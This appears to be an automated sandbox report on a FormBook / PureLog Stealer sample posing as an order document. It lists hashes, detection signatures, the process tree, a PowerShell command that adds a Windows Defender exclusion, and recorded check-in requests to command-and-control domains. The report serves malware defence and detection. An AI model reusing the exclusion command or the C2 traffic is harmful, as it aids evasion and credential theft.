Windows Analysis Report
ORDER REF 47896798 PSMCO.exe

Overview

General Information

Sample name: ORDER REF 47896798 PSMCO.exe
Analysis ID: 1585942
MD5: fa117772a94f43197a4632f47e78a56d
SHA1: 717e83a352d1b81e9d5e3178f7d008c64a5e5efc
SHA256: 51c1cf58f48a4cdad053a881d872925ec79a5a72f07d67a9b79bb13abaf636d3
Tags: exe, user-James_inthe_box

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ORDER REF 47896798 PSMCO.exe (PID: 3568 cmdline: "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe" MD5: FA117772A94F43197A4632F47E78A56D)
    • powershell.exe (PID: 3704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ORDER REF 47896798 PSMCO.exe (PID: 5268 cmdline: "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe" MD5: FA117772A94F43197A4632F47E78A56D)
      • oDhSPGbJgMIIvl.exe (PID: 1476 cmdline: "C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Utilman.exe (PID: 3944 cmdline: "C:\Windows\SysWOW64\Utilman.exe" MD5: 4F59EE095E37A83CDCB74091C807AFA9)
          • oDhSPGbJgMIIvl.exe (PID: 2300 cmdline: "C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5612 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4561456919.0000000004F50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2292332224.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2127145290.0000000005A90000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000007.00000002.4561622867.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.4563177809.0000000004F10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
5.2.ORDER REF 47896798 PSMCO.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.ORDER REF 47896798 PSMCO.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.ORDER REF 47896798 PSMCO.exe.40f9970.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                      System Summary

                      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ParentImage: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe, ParentProcessId: 3568, ParentProcessName: ORDER REF 47896798 PSMCO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ProcessId: 3704, ProcessName: powershell.exe
                      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ParentImage: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe, ParentProcessId: 3568, ParentProcessName: ORDER REF 47896798 PSMCO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe", ProcessId: 3704, ProcessName: powershell.exe

                      AV Detection

                      Source: ORDER REF 47896798 PSMCO.exe, Avira: detected
                      Source: http://www.f5jh81t3k1w8.sbs/cu07/, Avira URL Cloud: Label: malware
                      Source: http://www.f5jh81t3k1w8.sbs/cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4H, Avira URL Cloud: Label: malware
                      Source: ORDER REF 47896798 PSMCO.exe, Virustotal: Detection: 48%
                      Source: ORDER REF 47896798 PSMCO.exe, ReversingLabs: Detection: 52%
                      Source: Yara match, File source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000007.00000002.4561456919.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2292332224.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4561622867.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000009.00000002.4563177809.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.4560972615.00000000026E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000005.00000002.2294192340.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: ORDER REF 47896798 PSMCO.exe, Joe Sandbox ML: detected
                      Source: ORDER REF 47896798 PSMCO.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: ORDER REF 47896798 PSMCO.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Utilman.pdb source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4557268492.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000003.2228849768.000000000099B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215812419.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4557525430.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2299005386.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2291191477.0000000004D5B000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: ORDER REF 47896798 PSMCO.exe, ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, Utilman.exe, 00000007.00000002.4561884610.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2299005386.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000003.2291191477.0000000004D5B000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000007.00000002.4561884610.000000000524E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: Utilman.pdbGCTL source: ORDER REF 47896798 PSMCO.exe, 00000005.00000002.2290830166.0000000001477000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4557268492.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000003.2228849768.000000000099B000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 7_2_0321C830 FindFirstFileW,FindNextFileW,FindClose, 7_2_0321C830
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe, Code function: 4x nop then lea esp, dword ptr [ebp-04h], 0_2_07837896
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 4x nop then xor eax, eax, 7_2_03209F80
                      Source: C:\Windows\SysWOW64\Utilman.exe, Code function: 4x nop then mov ebx, 00000004h, 7_2_054004E8

                      Networking

                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49843 -> 192.186.58.31:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49971 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49984 -> 47.83.1.90:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49981 -> 47.83.1.90:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 199.192.21.169:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49996 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49955 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 104.21.53.168:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 194.58.112.174:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 192.64.119.109:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 192.64.119.109:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49980 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 103.247.11.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 192.64.119.109:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50012 -> 103.247.11.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 103.247.11.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 199.59.243.228:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49983 -> 47.83.1.90:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50013 -> 192.186.58.31:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49979 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 104.21.53.168:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49982 -> 47.83.1.90:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 103.247.11.204:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50017 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 199.59.243.228:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 192.64.119.109:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 104.21.53.168:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 199.192.21.169:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 199.59.243.228:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49988 -> 104.21.53.168:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 154.213.39.66:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49992 -> 199.59.243.228:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 199.192.21.169:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 199.192.21.169:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 154.213.39.66:80
                      Source: DNS query: www.solidf.xyz
                      Source: DNS query: www.laduta.xyz
                      Source: Joe Sandbox View, IP Address: 13.248.169.48
                      Source: Joe Sandbox View, IP Address: 199.192.21.169
                      Source: Joe Sandbox View, ASN Name: AMAZON-02US
                      Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
                      Source: Joe Sandbox View, ASN Name: VODANETInternationalIP-BackboneofVodafoneDE
                      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /rdtl/?T4OdNH=ZOY+qajotO8Y54RWsMlJRfAzJROg7M0EIy2xGwNHpdBqbD/KLW5LjtA9XnFn7YFdiYP1wWcAq05pnCTjdSlGxG6S3f6vZO/FXf/kuh5YN7SlcCVE00CSvDbDDRrbh0G7SoDKmOo=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.aihuzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.f5jh81t3k1w8.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /6jon/?r4=tP5HWLt8wXstw4H&T4OdNH=lY14yI5fwZOcgUQUpnTLlx+QJBfbC4DwEOc7MQQgkkxJhrqVuxiq0TqPiA2X0dq4ve8sLU4ITp6q3cu8oZorZNmhdsAOEHd31HcaUahVOt7Sj+u/MvofX8Uu67Ih0HTVKoUtY2c= HTTP/1.1Host: www.cruycq.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /qc6u/?T4OdNH=KasN1xnr6qxo50+siIN0KAfRtD0D1F2Xjd0YqYDU3pURb3uX+HWLUZelx9Jnej1VJkKFsqm6fN7HUYc3wzos1lmCBt8frBU6tWvEY3xAPNLu5kbYSa6DvHLcvpdXX1zJ5HhRaag=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.neoparty.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /m5bf/?T4OdNH=FKbczbLQ0sosfCA1qCrPSRQ7VsQywqY/pLAdnJ/+09co5PW+cyiO7Vblbf5B8jAN4N3DOHH6+lmh0DtSmFnRLbtcPKmyFQ0Njr8nYR2PceIb1tebNbsHFqS/Z3HN1OVssaooHgA=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.deadshoy.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /9bhq/?T4OdNH=E1KWPzuDUrXzeIr+MheblCNEP6GOTx17RfcrRTPFJ37rektGz/Z4QpsAgIJ1fke2ZLjhPbUfcs2Q2jBDnmdO4FnF2DWbeyRHVN+LoHOctdylDUorIjBcKbLwehehFJbE7gRrWpM=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.mosorehlable.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /stho/?T4OdNH=mmN5n3cJgwCS/hPSyyDLsNIVXPMNWoUq1Zr31hV11eqK/h/PlpONTBiAVWsNASboghm0fbZ0NPzr87fjFnRbzCyOI219SS/ig8yR+3V4slRmOpkmcKIusrBtdNsAS/Tkjrlhc08=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.solidf.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /5mxq/?T4OdNH=iO94RS5UfBQ5HC+BbRXYGHpdoey0nMmihjIqhakPtq2eYvg9AqcPAmRUPZBNji7wd38qvvn/XQ+Vfr9uTuQ/zSitIKONVg6W4BJ6U8+dApebSQkrfqhDfnKkuLJ5c8X1k/dz1dA=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.laduta.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /13to/?r4=tP5HWLt8wXstw4H&T4OdNH=z2EgoPQiqWsx10s8imXn9EhLUqHIpfNm2M9hnivL2yIwQ5T5ZMz+m2ngmAV/UVpa818CagjxjfYFH/Xhgr0dlnT3xa+eVvaI/ZjmdVMj8eQS2FfncZyG6J/yATIX4FRolS5bDYc= HTTP/1.1Host: www.londonatnight.coffeeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /vw2j/?T4OdNH=F7RSTrW3DDBOwoki0QfY8aMemtw+1yb0ACfdAp004E8YzbKK22gfddsBa0Epuash8ZsdFHh4aRsfLVhTQDdPUk63V/0r5CFiWCnEBQtSiunsCfq281UiBsQJqTZKZhMxvZDp0qs=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.itcomp.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /rdtl/?T4OdNH=ZOY+qajotO8Y54RWsMlJRfAzJROg7M0EIy2xGwNHpdBqbD/KLW5LjtA9XnFn7YFdiYP1wWcAq05pnCTjdSlGxG6S3f6vZO/FXf/kuh5YN7SlcCVE00CSvDbDDRrbh0G7SoDKmOo=&r4=tP5HWLt8wXstw4H HTTP/1.1Host: www.aihuzhibo.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                      Source: unknownHTTP traffic detected: POST /cu07/ HTTP/1.1Host: www.f5jh81t3k1w8.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.f5jh81t3k1w8.sbsReferer: http://www.f5jh81t3k1w8.sbs/cu07/Cache-Control: no-cacheContent-Length: 211Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
